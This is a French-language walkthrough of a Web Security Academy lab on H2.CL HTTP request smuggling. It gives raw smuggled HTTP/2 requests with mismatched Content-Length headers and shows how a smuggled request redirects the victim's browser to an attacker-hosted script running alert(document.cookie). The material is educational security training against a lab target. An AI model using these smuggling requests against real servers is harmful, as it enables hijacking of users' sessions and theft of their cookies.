Smuggling H2.CL

H2.CL request smuggling

Lab: H2.CL request smuggling | Web Security AcademyWebSecAcademy

Ce laboratoire est vulnérable au request smuggling car le serveur front-end rétrograde les requêtes HTTP/2 même lorsqu’elles comportent une longueur ambiguë.

L’objectif est de mener une attaque permettant au navigateur de la victime de charger et exécuter un fichier JavaScript malveillant hébergé sur l’exploit server, contenant :

alert(document.cookie)

L’utilisateur victime visite la page d’accueil toutes les 10 secondes.

Déclenchement d’un 404 via smuggling

On force une incohérence de longueur afin de provoquer un 404 Not Found :

POST / HTTP/2

Host: 0a8c00880499cdd181ae9d4900ed000f.web-security-academy.net

Content-Length: 14



test=testing

GET /error/ HTTP/1.1

Host: 0a8c00880499cdd181ae9d4900ed000f.web-security-academy.net

Content-Length: 11



test=test

Analyse du comportement de l’application

La page charge automatiquement un script :

resources/js/analytics.js?uid=3309545055

Ce script génère un identifiant aléatoire et envoie une requête vers :

/analytics?id=<valeur aléatoire>

Extrait de la fonction :

function randomString(length, chars) {
    var result = '';
    for (var i = length; i > 0; --i) result += chars[Math.floor(Math.random() * chars.length)];
    return result;
}
var id = randomString(16, '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ');
fetch('/analytics?id=' + id)

Observation des chemins acceptés

Une requête smuggled vers :

GET /resources HTTP/1.1

Host: test.com

Content-Length: 11



test=test

est acceptée.

En revanche, d’autres chemins ne le sont pas.

Injection du script malveillant

On place notre charge utile dans le fichier fourni par l’exploit server :

nom du fichier : resources
contenu (body) :

<script>alert(document.cookie)</script>

La victime est redirigée vers ce fichier, et le navigateur exécute l’alerte, confirmant l’exploitation.

Mis à jour il y a 15 jours

Ce contenu vous a-t-il été utile ?